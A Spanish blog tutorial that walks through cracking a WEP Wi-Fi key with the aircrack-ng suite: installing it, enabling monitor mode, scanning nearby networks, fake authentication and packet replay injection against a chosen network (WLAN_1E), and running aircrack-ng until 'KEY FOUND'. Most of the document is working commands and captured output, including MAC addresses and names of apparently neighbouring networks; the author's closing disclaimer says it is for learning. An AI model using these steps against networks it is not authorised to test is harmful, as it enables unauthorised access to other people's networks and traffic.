Crackear Wifi – Claves WEP

¿QUE ES WEP?

WEP, acrónimo de Wired Equivalent Privacy o “Privacidad Equivalente a Cableado”, es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4 que utiliza claves de 64 bits (40 bits más 24 bits del vector de iniciación IV) o de 128 bits (104 bits más 24 bits del IV). Los mensajes de difusión de las redes inalámbricas se transmiten por ondas de radio, lo que los hace más susceptibles, frente a las redes cableadas, de ser captados con relativa facilidad. Presentado en 1999, el sistema WEP fue pensado para proporcionar una confidencialidad comparable a la de una red tradicional cableada.

Comenzando en 2001, varias debilidades serias fueron identificadas por analistas criptográficos. Como consecuencia, hoy en día una protección WEP puede ser violada con software fácilmente accesible en pocos minutos. Unos meses más tarde el IEEEcreó la nueva corrección de seguridad 802.11i para neutralizar los problemas. Hacia 2003, la Alianza Wi-Fi anunció que WEP había sido reemplazado por Wi-Fi Protected Access (WPA). Finalmente en 2004, con la ratificación del estándar completo 802.11i (conocido como WPA2), el IEEE declaró que tanto WEP-40 como WEP-104 fueron revocados por presentar fallos en su propósito de ofrecer seguridad. A pesar de sus debilidades, WEP sigue siendo utilizado, ya que es a menudo la primera opción de seguridad que se presenta a los usuarios por las herramientas de configuración de los routers aún cuando sólo proporciona un nivel de seguridad que puede disuadir del uso sin autorización de una red privada, pero sin proporcionar verdadera protección. Fue desaprobado como un mecanismo de privacidad inalámbrico en 2004, pero todavía está documentado en el estándar actual.

WEP es a veces interpretado erróneamente como Wireless Encryption Protocol.


Información que tenemos que leer antes de empezar nada:

Manual Básico (in)seguridad wireless

http://wiki.elhacker.net/seguridad-wireless/introduccion/manual-b%C3%A1sico-inseguridad-wireless

Modo monitor

http://wiki.elhacker.net/seguridad-wireless/introduccion/modo-monitor

Vulnerabilidades del cifrado WEP

http://wiki.elhacker.net/seguridad-wireless/introduccion/vulnerabilidades-del-cifrado-wep

Auditoria wireless: ¿Que tarjeta Wifi debo usar/comprar?

http://frikeando.wordpress.com/2006/06/29/auditoria-wireless-%C2%BFque-tarjeta-wifi-debo-usarcomprar/

 

Para empezar tenemos que instalar la suit de aircrack-ng, yo lo voy hacer bajo una distribución Debian.

apt-get install build-essential devscripts dpkg-dev debhelper
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3-2.dsc
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3-2.diff.gz
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3.orig.tar.gz
dpkg-source -x aircrack-ng_1.0~rc3-2.dsc
cd aircrack-ng-1.0~rc3
dpkg-buildpackage
dpkg -i ../aircrack-ng*.deb

Una vez ya instalado activamos el modo monitor.

airmon-ng start wlan0

Se activa en mon0, (esto depende ya de tu tarjeta de red)

Interface       Chipset         Driver

wlan0           Realtek 8187L   rtl8187 - [phy0]
                                (monitor mode enabled on mon1)
mon0            Realtek 8187L   rtl8187 - [phy0]

Empezamos a monitorear.

airodump-ng mon0

Como podemos observar nos muestra todos las redes disponibles que se encuentran a nuestro alrededor. Saldrán varios elementos al que tenemos que prestar atención. BSSID (Una clave estilo Mac), CH (Canal donde donde se encuentra esa red), ENC (Enriptación utilizada) y ESSID (El nombre de la red)

 CH  8 ][ Elapsed: 24 s ][ 2011-09-11 11:07                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:16:B6:11:41:68  219       10        0    0  11  54  WPA  TKIP   PSK  Xanikin
 E0:91:53:0B:C3:BD  204       62      178    7   1  54. WEP  WEP         WLAN_1E
 00:14:7C:48:0C:74  199        4        0    0  11  54. WEP  WEP         3Com
 E0:91:53:13:41:BF  197        3        0    0   4  54. WPA  TKIP   PSK  bucanero
 00:1D:60:BD:1A:E1  197       11        0    0   1  54  OPN              WebSTAR
 5C:33:8E:CF:F2:F2  196        6        0    0  11  54. WPA2 CCMP   PSK  WNL-3000
 00:1D:60:06:B0:52  196       17        0    0   6  54  WEP  WEP         Webstar
 64:68:0C:7E:DF:28  192        3        0    0   6  54  WPA  CCMP   PSK  JAZZTEL_DF27
 00:23:54:AF:1C:F2  194       34       29    0   1  54  WPA2 TKIP   PSK  ONO017166
 64:68:0C:4C:C8:2B  192       12        0    0   3  54  WPA  TKIP   PSK  WLAN_C828
 00:24:D1:2B:44:BD  191        3        0    0   9  54  WEP  WEP         GLORIA
 00:60:B3:ED:1E:8E  192        4        0    0  10  54. WEP  WEP         karlkox
 00:23:54:AF:1C:F5  187        2        0    0   6  54  WPA2 TKIP   PSK  ONO807702
 64:16:F0:DB:9C:07  184        2        0    0  11  54  WPA2 CCMP   PSK  vodafone9C06
 00:19:70:3D:99:F6  186        4        0    0   6  54. WPA2 CCMP   PSK  Orange-22d2
 40:4A:03:B5:7D:83  183        8        0    0   3  54. WPA  TKIP   PSK  <length:  6>
 00:11:F5:EF:DA:21   -1        0       40    7  11  -1  WEP  WEP         <length:  0>                                

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes                                             

 E0:91:53:0B:C3:BD  00:C0:CA:52:48:30    0   0- 1  5266     4375
 00:23:54:AF:1C:F2  00:0C:F6:6A:30:6C   -1   1- 0     0        1
 00:23:54:AF:1C:F2  00:21:00:1D:1D:FF   -1  48- 0     0       25
 00:11:F5:EF:DA:21  70:F1:A1:C5:4A:E4  198   0-24   599       44
^C
rokitoh@red-orbita#

Capturamos paquetes:

Sintaxis a utilizar:

airodum-ng -c [ CANAL ]  -w [ ESSID ] -bssid [ BSSID ] [ Interfaz ]

Ejemplo:

airodump-ng -c 1 -w WLAN_1E -bssid  E0:91:53:0B:C3:BD mon0

 CH  1 ][ Elapsed: 1 hour 25 mins ][ 2011-09-11 12:08 ][ fixed channel mon0: 3                                     

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 E0:91:53:0B:C3:BD  204  76    43229   348570   49   1  54. WEP  WEP    OPN  WLAN_1E                               

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes                                           

 E0:91:53:0B:C3:BD  F4:0B:93:A5:29:C3  194   0-11     0      246

Tenemos que tener en cuenta que tiene que haber un cliente conectado, ya que si no no funcionara, mas adelante publicare otro manual de como crackearla sin tener un cliente conectado.

-c Especificamos el canal.
-w Especificamos ESSID.
–bssid pues se especifica el BSSID como su propio nombre indica.
mon0  Interfaz.

Utilizamos la herramienta airplay-ng para injectar paquetes y así elevar los vectores de inicio de la captura.

aireplay-ng -1 6000 -a [BSSID] -h [TU MAC]  [Interfaz ]

Ejemplo:

aireplay-ng -1 6000 – E0:91:53:0B:C3:BD  -h 00:c0:ca:52:48:30 mon0

Nos muestra una pantalla como esta:

10:46:20 Sending Authentication Request (Open System) [ACK]
10:46:20 Authentication successful
10:46:20 Sending Association Request [ACK]
10:46:20 Association successful :-) (AID: 1)

-1 6000 Es un tipo de ataque que genera una autenticación falsa con retraso.
-a Es el punto de acces.
-h Es el source, aquí ponemos nuestra MAC address.
mon0 La interfaz que utilizamos.

Si nos fijamos en el terminal donde estamos motorizando los #DATA esta subiendo a mayor velocidad

 CH  1 ][ Elapsed: 52 s ][ 2011-09-11 12:09                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 E0:91:53:0B:C3:BD  204  66      474     3513   59   1  54. WEP  WEP         WLAN_1E                              

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes                                           

 E0:91:53:0B:C3:BD  00:24:2C:36:4A:B1  190   0- 1    56       18
 E0:91:53:0B:C3:BD  F4:0B:93:A5:29:C3  195   0-11     0        1
 E0:91:53:0B:C3:BD  00:C0:CA:52:48:30    0   0- 1   188    48496

Para poder ver lo que inyectamos:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h [tu MAC] [INTERFAZ]

Ejemplo:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b  E0:91:53:0B:C3:BD -h 00:c0:ca:52:48:30 mon0

Nos debería mostrar una imagen similar a esto:

Cnt 297539 packets…(499 pps)

Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID = E0:91:53:0B:C3:BD
Dest. MAC = 00:24:2C:36:4A:B1
Source MAC = E0:91:53:0B:B4:1E

0x0000: 0842 3401 0024 2c36 4ab1 e091 530b c3bd .B4..$,6J…S…
0x0010: e091 530b b41e e0e9 8305 2100 ebc7 d402 ..S…….!…..
0x0020: e707 d8a3 3484 90c1 1e02 2c89 8f52 6821 ….4…..,..Rh!
0x0030: f465 304f 23ed e060 c5e2 ccc4 3575 a72a .e0O#..`….5u.*
0x0040: 9627 2c90 .’,.

Use this packet ? y
Saving chosen packet in replay_src-0911-113246.cap
You should also start airodump-ng to capture replies.

Sent 3000 packets…. (500 pps)

Esperamos un rato… nos tenemos que dijar en los #Data como va subiendo, cuando tengamos un numero decente toca pesarle el aircrack-ng para crackear la contraseña, esta en concreto  me esta costando un montonazo, no quiere ser crackeada… jajaj

Crackeamos

aircrack-ng -z [BSSID]*.cap

Ejemplo:


aircrack-ng -z WLAN_1E-02.cap

Si nos sale un error como este es que no hemos conseguido suficiente DATAS, así que toca seguir esperando, PACIENCIA!

Failed. Next try with 5000 IVs.

Finalmente la paciencia da sus frutos aunque me a costado esta red.

Aircrack-ng 1.0 rc1

[00:17:52] Tested 139537 keys (got 320792 IVs)

KB depth byte(vote)
0 112/113 EC(322816) 0D(322560) 68(322304) 81(322304) 61(322048) 36(321792) 2D(321536) 3E(321536)
1 17/ 1 23(333824) 28(333312) 0D(333056) 62(333056) B4(332544) 0A(332288) CF(332288) E6(332288)
2 16/ 2 DE(334848) 7B(334080) C4(333568) CF(333312) E1(333312) C6(333056) 25(332544) 37(332544)
3 0/ 2 06(468224) F3(346880) 8D(340992) 83(340480) A7(340480) B6(340480) B9(340224) 3D(339712)
4 11/ 45 06(337664) 71(337408) A8(337408) 15(336640) 80(336384) 90(336384) CA(336128) 26(335872)
KEY FOUND! [XXXXXXXXXX ]

MAS INFORMACIÓN:

La web oficial de aircrack-ng tiene unos muy buenos tutoriales

http://www.aircrack-ng.org/doku.php?id=tutorial

Espero que os sirva de ayuda y este manual es de aprendizaje no para que pitareis wifi para engancharos por el morro.

Un saludo, rokitoh!


 

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *